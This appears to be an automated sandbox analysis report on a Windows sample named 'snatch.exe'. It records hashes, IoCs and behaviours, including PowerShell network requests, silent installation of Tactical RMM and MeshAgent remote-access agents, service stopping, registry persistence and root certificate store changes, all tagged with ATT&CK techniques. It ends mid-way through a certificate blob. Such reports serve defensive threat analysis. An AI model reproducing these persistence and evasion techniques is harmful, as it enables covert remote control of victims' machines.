fc6c5e27df90e9ffa84b0285be5cfa009fe7cc07e5fe23c9b8071e15958e9480

Analysis

max time kernel
142s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
02/05/2024, 04:45

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

2024-05-02_089359e83c311755633b97cb26fef287_snatch.exe
Size

5.0MB
MD5

089359e83c311755633b97cb26fef287
SHA1

f25f6ab0a21429134bdd3714c22134aeab35e583
SHA256

fc6c5e27df90e9ffa84b0285be5cfa009fe7cc07e5fe23c9b8071e15958e9480
SHA512

7715d8bca55b6c0ac693e72d7cfde0f54c94b550051304cb8cfd584bf201e36826a7f550e210c6a8a7ee69545fdd8bd1ca4de16354f0a6194fe09945f65f4982
SSDEEP

49152:WgnMTzHN+QelVlwrb/T8vO90d7HjmAFd4A64nsfJhi9Otrzb4Xe1FQc1EX8X7BuT:YN+QelVeXpV1CsupmhEv+eT

Score

9^/10

discovery evasion persistence

Malware Config

Signatures

Detects executables containing URLs to raw contents of a Github gist 2 IoCs

resource	yara_rule
behavioral2/files/0x000800000002438b-1914.dat	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral2/memory/1108-2185-0x000001ED5B650000-0x000001ED5C0C8000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

Blocklisted process makes network request 2 IoCs

flow	pid	Process
91	4048	powershell.exe
109	4048	powershell.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	meshagent.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 12 IoCs

pid	Process
4652	tacticalagent-v2.7.0-windows-amd64.exe
2676	tacticalagent-v2.7.0-windows-amd64.tmp
968	tacticalrmm.exe
3020	tacticalrmm.exe
5020	meshagent.exe
1604	MeshAgent.exe
2580	MeshAgent.exe
2000	tacticalrmm.exe
2204	tacticalrmm.exe
4668	python.exe
2544	MeshAgent.exe
1108	choco.exe

Loads dropped DLL 8 IoCs

pid	Process
4668	python.exe
4668	python.exe
4668	python.exe
4668	python.exe
4668	python.exe
4668	python.exe
4668	python.exe
4668	python.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A92174CCCFF93466808DB9D3AF069CDA5A6968CA	tacticalrmm.exe
File opened for modification	C:\Windows\System32\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\DAB69D8A34B2B4249AA81EED997F724A3AB7F6BD	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\bcrypt.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ole32.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\08AE63403F4900EE977996A0BC7F9A0385D4EFA2	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\symbols\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A92174CCCFF93466808DB9D3AF069CDA5A6968CA	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcrypt.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\symbols\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\bcrypt.pdb	MeshAgent.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\Demos\win32ts_logoff_disconnected.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\chardet\mbcharsetprober.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\lib\win32cryptcon.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\utils\logging.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\test\testMSOfficeEvents.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\ucrtbase.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\api-ms-win-crt-filesystem-l1-1-0.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\chardet\mbcharsetprober.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\chardet\langturkishmodel.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\pep517\check.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\server\localserver.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\wheel.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\six-1.15.0.dist-info\WHEEL	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32com\test\testxslt.xsl	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\taskscheduler\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\urllib3-1.26.2.dist-info\WHEEL	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\index\collector.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\html5lib\treebuilders\dom.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\Demos\fontdemo.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\urllib3\response.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\Demos\service\nativePipeTestService.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Scripts\wmitest.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\vcruntime140.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pythonwin\pywin\debugger\fail.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\libffi-7.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\urllib3\util\ssl_.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\_distutils\command\register.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\wheel\vendored\packaging\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32ctypes\core\cffi\_resource.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\resolvelib\compat\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\Demos\CopyFileEx.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\cli\base_command.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\validators\truthy.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\taskscheduler\test\test_localsystem.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\distlib\index.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools-51.3.3.dist-info\dependency_links.txt	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\api-ms-win-core-console-l1-1-0.dll	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\chardet\langhebrewmodel.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\html5lib\_tokenizer.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\gui-32.exe	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\win32pdh.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\chardet\cli\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\shell\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\commands\__init__.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_internal\self_outdated_check.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\dist.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\errors.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\distlib\wheel.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\psutil-5.8.0.dist-info\METADATA	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\Demos\security\regsave_sa.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32ctypes\core\cffi\_dll.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\pip\_vendor\webencodings\tests.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\setuptools\unicode_utils.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\win32event.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\win32profile.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\msgpack\_cmsgpack.cp38-win_amd64.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\msgpack\_version.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\lib\win32pdhutil.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32comext\propsys\propsys.pyd	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\isapi\samples\redirector_asynch.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\urllib3\util\queue.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\validators\hashes.py	tacticalrmm.exe
File created	C:\Program Files\TacticalAgent\py38-x64\Lib\site-packages\win32\Demos\EvtSubscribe_pull.py	tacticalrmm.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3532	sc.exe
2320	sc.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3536	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	tacticalrmm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-392 = "Arab Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2941 = "Sao Tome Daylight Time"	tacticalrmm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-682 = "E. Australia Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	tacticalrmm.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	tacticalrmm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	tacticalrmm.exe

Modifies system certificate store 2 TTPs 17 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336